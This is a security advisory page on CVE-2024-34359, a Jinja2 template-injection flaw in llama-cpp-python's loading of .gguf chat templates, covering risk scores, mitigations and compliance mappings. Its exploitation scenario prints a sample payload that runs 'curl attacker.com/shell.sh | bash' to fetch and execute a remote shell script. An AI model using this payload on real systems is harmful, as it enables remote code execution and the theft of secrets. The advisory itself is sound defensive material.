CVE-2024-34359 — CRITICAL (CVSS 9.6) AI Security Vulnerability

CISO Take

Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.

Risk Assessment

Critical exposure for all llama-cpp-python deployments. CVSS 9.6 with network vector and low complexity means this is trivially weaponizable once a malicious .gguf is in circulation. The 'User Interaction Required' flag is misleading in AI/ML contexts — loading new models is routine workflow for developers, MLOps, and researchers, making this practically no barrier. Scope change (C:H/I:H/A:H) means full host takeover, not just model compromise. No evidence of active KEV exploitation at time of publication, but model-as-attack-vector is a maturing supply chain threat with high probability of real-world abuse.

Severity & Risk

CVSS 3.1

9.6 / 10

EPSS

39.4%

chance of exploitation in 30 days

Higher than 97% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Moderate

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

○ EPSS exploit prediction: 39%

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI Required

S Changed

C High

I High

A High

Recommended Action

6 steps

Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing.
Source control: only load .gguf files from verified, internally-mirrored model registries — treat external model files as untrusted binaries.
Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.
Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers).
Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry.
Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Framework Model Inference AML.T0002.001 - Models AML.T0010.003 - Model AML.T0011.000 - Unsafe AI Artifacts AML.T0018.002 - Embed Malware AML.T0050 - Command and Scripting Interpreter

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 23 - Obligations of providers of general-purpose AI models

ISO 42001

A.6.2.5 - AI system security A.8.1 - AI supplier relationships

NIST AI RMF

GOVERN 5.2 - AI supply chain and third-party risk management MANAGE 2.4 - Risks from AI system components and dependencies

OWASP LLM Top 10

LLM03 - Supply Chain

Frequently Asked Questions

What is CVE-2024-34359?

Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.

Is CVE-2024-34359 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-34359, increasing the risk of exploitation.

How to fix CVE-2024-34359?

1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing. 2. Source control: only load .gguf files from verified, internally-mirrored model registries — treat external model files as untrusted binaries. 3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files. 4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers). 5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry. 6. Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.

What systems are affected by CVE-2024-34359?

This vulnerability affects the following AI/ML architecture patterns: local LLM inference, model serving APIs, LLM application frameworks, AI development workstations, MLOps and CI/CD pipelines.

What is the CVSS score for CVE-2024-34359?

CVE-2024-34359 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 39.41%.

Technical Details

NVD Description

llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` 's Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.

Exploitation Scenario

An adversary uploads a malicious .gguf model to Hugging Face under a convincing namespace (e.g., a typosquat of a popular model). The model's metadata contains a crafted chat_template field with a Jinja2 payload exploiting Python's object introspection: `{{ ''.__class__.__mro__[2].__subclasses__()[XXX]('curl attacker.com/shell.sh | bash', shell=True, ...) }}`. An ML engineer discovers the model via a search or dependency, pulls it for benchmarking, and calls `Llama(model_path='malicious.gguf')`. At instantiation — before any prompts are sent — the template is parsed and rendered in an unsandboxed environment, executing the payload. The adversary receives a reverse shell on the inference host with the privileges of the Python process, gaining access to GPU resources, environment secrets, and internal APIs.